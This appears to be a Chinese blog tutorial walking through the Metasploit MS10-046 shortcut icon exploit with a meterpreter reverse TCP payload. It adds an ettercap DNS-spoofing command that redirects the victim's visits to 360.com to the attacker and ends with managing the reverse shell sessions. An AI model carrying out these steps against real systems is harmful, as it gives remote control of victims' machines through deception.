Metasploit ms10_046_shortcut_icon_dllloader 利用

Metasploit ms10_046_shortcut_icon_dllloader 利用

使用该模块需要将apache关闭,否则会出现端口冲突。有一定几率会不成功

  1. search shortcut获取可利用的漏洞

    这里我们使用exploit/windows/browser/ms10_046_shortcut_icon_dllloader

  2. 设置参数,使用默认windows/meterpreter/reverse_tcp做为攻击载荷

  1. 利用漏洞,根据提示。我们需要让目标机访问192.168.80.200:80

  2. 为了目标机更容易上当,我们可以使用ettercap的dns_spoof插件,具体参考:https://www.cnblogs.com/kikochz/p/13688535.html。ettercap -Tq -P dns_spoof /// ///默认使用第一个接口。当目标机访问我们预先设置好的360.com时就会跳转到攻击机,并反弹shell

  3. 我们其实可以发现该漏洞时鉴于windows的共享资源漏洞

  4. 我们可以通过sessions 查看反弹会的shell会话,通过sessions -i num来重新连接

原文地址:https://www.cnblogs.com/kikochz/p/13695578.html